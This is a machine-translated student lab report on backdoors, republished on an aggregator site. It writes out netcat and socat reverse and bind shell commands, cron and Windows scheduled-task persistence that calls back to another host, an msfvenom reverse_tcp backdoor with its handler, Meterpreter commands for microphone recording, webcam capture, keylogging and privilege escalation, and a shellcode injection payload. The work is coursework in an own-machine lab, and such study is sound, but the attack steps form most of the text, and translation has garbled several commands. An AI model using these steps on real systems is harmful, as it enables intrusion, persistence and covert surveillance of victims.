20,174,321 Wang Bai boat -Ep2- back door Principles and Practice

Others 2020-03-22 17:06:27 views: null

table of Contents

  • Principle

  • Download and functional testing

  • Content Experiments

  • Questions

  • Experimental problems encountered and solutions

  • Experimental Experience

First, Principle

(A) the back door

1. Concept: backdoor programs that generally refers to a method to bypass security controls and access to a program or system access. During the development phase of software, programmers often create backdoors in the software so that you can modify the program design defects. However, if these backdoors are other people know, or did not remove the backdoor before the release of the software, then it becomes a security risk, vulnerable to hackers as vulnerability to attack.

2. Main Category:

    • Page back door
    • Thread insert the back door
    • Extended back door
    • C / S backdoor
    • roo kit

(B) common backdoor

1.Netcat/Ncat/nc

It is a bottom tool, also known as nc, ncat, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.

2.socat

Nc is an enhanced version of a two-way data transmission between relays the independent data channel. Socat basic function is to create two bidirectional byte stream used to transmit data. File contains data channels, pipes, equipment, etc., the main feature is to establish the data flow between the two channels, and supports numerous protocols and link means such as ip, tcp, udp, ipv6 like.

3.meterpreter

Meterpreter Metasploit is the default Windows system Shell Code under. Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, verify vulnerability mitigation measures and management expert-driven security assessments carried out, providing true security risk intelligence. These features include smart development, code audit, Web application scanning, social engineering.

Second, software downloads, and functional testing

(A) windows download ncat and socat archive

  • Download the attachment to the teacher's guidance  Netcat  and  Socat  file, after extracting the machine placed in the appropriate folder.
  • After the teacher upload attachments netcat must extract flash back to run the program again to download from the official website, the official website download link https://eternallybored.org/misc/netcat/ .
  • Download after being identified as a Trojan virus, choose to retrieve and extract the ncat.exe copied to the administrator directory.
  • Then open cmd operational.

(B) Windows to get Linux's Shell

  • On the Windows side cmd enter  ipconfig  to see the local host ip address: 192.168.1.7
  • At the input end of the cmd windows  NC -l -p 4321   Open monitoring (port number student number). -l that is listening.
  • Select firewall pop-up to allow access.
  • Enter the Linux side nc 192.168 . 1.7 4321 -e / bin / SH  . -e execute the shell program.
  • Windows end to get the Linux shell, shell commands can be entered:

(C) Linux get the Windows shell

  • Linux-ended input  ip addr  View kali Linux ip address

Here there is a problem, kali Linux eth0 NIC's gone, only l0 interface. I found online a lot of solutions, but are useless to me kali, kali even came close to re-install, and finally solve the problem. Solutions will write about in detail later.

So get the Linux ip address: 192.168.246.134 (the next day to continue the restart, it was found behind the camera where there have been many problems, I can not found the time to do it all again, ip address it is magically changed ...) after changes to 192.168.246.137.

  • Linux-ended input  nc the -l -p 4321  Open monitoring.
  • In Windows 4321 rally connected to the linux port: ncat.exe -e cmd.exe 192.168 . 246.134 4321
  • Return kali linux, Linux gained the windows of the shell. At the command line interface, you can execute windows commands here to  dir  example. (Since when do forget the first shot, and later a fill operation on the screenshot.)

(D) to transfer data between Windows and Linux

  • Windows cmd input end nc.exe 192.168 . 246.134 4321  (Linux ip address and port number of student number)
  • Linux-ended input nc the -l -p 4321  (4321 listening port under kali)
  • Enter the characters after the connection successful experimental results show:

Third, the experimental content

(A) use netcat to obtain the host operating shell, cron start

  crontab is a timing tasks under Linux, every minute run time, according to a preset instruction execution profile.

  • Enter in the Linux  crontab -e  add a cron task area, select Edit 3.
  • Add the last line  20 * * * * / bin / netcat 192.168 . 1.7 4321 -e / bin / SH  , then  : wq  to save and exit. (20 minutes per hour represents the reverse link port Windows 4321 hosts).

  • After the time windows ends at 3:20 verify:

(B) the use socat get the host operating Shell, plans to start the task

  • Win in the host keyboard knock  Win + R  input  compmgmt.msc  to open the Computer Management].
  • Click Task Scheduler] folder [Task Scheduler Library], [Select] to create the task.
  •  4321w] [fill in name of the task, the new trigger.
  • New Action, choose [] in the program or script file path] [socat.exe, add the parameter field fill  tcp the listen-: 4321 Exec: cmd.exe, Pty, stderr  effect (of the order is bound to the cmd 4319 port, while the stderr cmd is redirected to stdout)

  • After creating the task ready

  •  20:35 pops up when a cmd window and firewall settings, firewall settings to allow access to select [].
  • The input end of the linux  socat - TCP: 192.168 . 1.7 : 4321  (first parameter - represent standard input and output, representative of the second stream to the port 4321 of Win host, has been successfully obtained at this time socat shell).

(C) use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell

  • Linux input terminal msfvenom -p Windows / Meterpreter / reverse_tcp lhost = 192.168 . 246.134 LPORT = 4321 -f EXE> 4321_backdoor.exe  (Linux IP) (generated in Linux 4321_backdoor.exe backdoor copied to win end)
  • File Manager can see the backdoor has been generated

  • In Windows cmd input end nc.exe -lv 4321 > 4321_backdoor.exe the controlled hosts file goes into receive mode, the input terminal of the Linux NC 192.168 . 1.7 4321 <4321_backdoor.exe  (win host ip) generated to the host backdoor on.
  •  But here I encountered a file can not transfer problem, turn off the firewall linux, win10 firewall, real-time protection, uninstall the antivirus software, but still can not be transferred. Retry endlessly many ways finally succeeded. Successful backdoor is meter_backdoor. (For details, see problems and solutions after)

  • Used on Linux msfconsole  enter msf console, enter the following command:
exploit use / Multi / Handler          // monitor settings payload 
the SET payload Windows / Meterpreter / reverse_tcp        // generated the backdoor as the payload 
the SET lhost 192.168 . 246.137        // IP address of the Linux side of 
the SET LPORT 4321     // port number previously entered consistent 
exploit     // start listening
  • On the Windows side close the command line window, double-click to run backdoor meter_backdoor.exe, found that to obtain the Windows shell after the return to the Linux side.

(Iv) use MSF meterpreter generated content acquisition target host audio, camera, keyloggers, etc., and try to put right

 1. Obtain permission to record

Recording and get permission to record a 10s audio:  record_mic -d 10  can be seen, after recording the save path, the audio can be played.

  2. Get the camera permission

Get permission to shoot camera:  webcam_snap

 

Looks quickly, need to be prepared in advance. (Here encountered many problems, and I think some of the other students, my computer camera has a problem, but did not, and finally succeeded)

 3. Get a keystroke logger

Get permission to get keylogging keystroke:  keyscan_start 

Read keystrokes record:  keyscan_dump 

 4. Get a screenshot rights

Get screenshots:  Screenshot 

 5. mention the right 

View the current user:  getuid 

The right to be mentioned:  getSystem  (mention the right to fail, reference blog sister school seniors and other students of the blog, without success)

(5) the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (plus optional)

  1. Generate the shellcode (see Experimental specific steps a)

  • Open the terminal 1, turn off address randomization, obtained according to machine code, configuration input file.
perl -e 'print "A" x 32;print"\x1\x2\x3\x4\\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode2
  • Check the address of the shellcode.

  • A 0xffffd2bc + 4 = 0xffffd2c0 have shellcode address, modify the generated input file.

2.msf injection

  • Open the terminal 2 input turns msf console, the following entries: 
    use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit

    (Ip host address and port number are obtained from the open notebook file downloaded.)

  • 1 before opening the input terminal  (INPUT CAT; CAT) | ./pwn123  , the terminal 2 can be used in shell, rebound proved successful connection.

Fourth, Questions

1. example you can think of possible ways to enter a backdoor on your system?

Download a file from a Web page requires a downloader, download bundle. Bundled file will contain backdoors.

 2. How do you know exemplified the back door to start up ( win and linux) way?

Windows: boot from the start

 Linux: Start Task Scheduler

 What gives you impressive array of features 3.Meterpreter there?

Meterpreter able to control the video camera, camera, recording keystrokes, etc., the full realization of a monitor.

4. How to find your system has not been installed back door?

Time on the computer virus detection by anti-virus software; computer logs to see there is no suspicious record; timely repair of computer system vulnerabilities detected.

Fifth, the experimental problems encountered and solutions

1.linux the eth0 card was gone, only ipv6, no ipv4

A law: # vim / etc / sysconfig / Network-scripts / the ifcfg-eth create the file, then save and exit.  

(Since my kali / etc in no sysconfig folder, so this method is not feasible, the Internet search data folder is not too sysconfig kali linux required)

法二: # vim /etc/network/interfaces 

Add in the configuration file

eth0 and the auto in 
iface eth0 and the inet dhcp for the

And then restart the network service  /etc/init.d/networking restart  successfully solve the problem.

2. backdoor file transfer failed

Here I failed many times, turned off the kali-side firewall (and many times that the state of the firewall), killing all the software also turned off the win side of the firewall, real-time protection, and also for the other port numbers re experiment many times, can not be transmitted. I have no way to restart the virtual machine and win10, the experiment done it again from scratch,  ip addr  , it was found kali ip address has changed ??? kali then change the ip address, then it is a success ???

3. the MSF Meterpreter get the camera permission failed

Here the operation fails, some students also see  Operation failed The: 731  , their interpretation is the host camera broken. But my computer camera is intact. Then I go back and finish after additional experiments to do, find it a success. You may persevering.

Six experimental experience

This experiment is really very difficult, I may be installed in Ex0 in kali Linux and students are not the same kali, some of the problems encountered Baidu can not be resolved, the reference classmates blog can not solve, but repeated n times somehow he succeeded. After this experiment I have great understanding for the planned tasks, also through this simple experiment to understand the principle of the back door, the back door of the formation of a series of processes, implantation, using the attacks have a preliminary understanding. Was struck by the power of Meterpreter future should always do a good job protecting privacy, to update vulnerability, update anti-virus software, anti-virus regularly to prevent your computer can also be controlled.

Guess you like

Origin www.cnblogs.com/w574/p/12543851.html
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com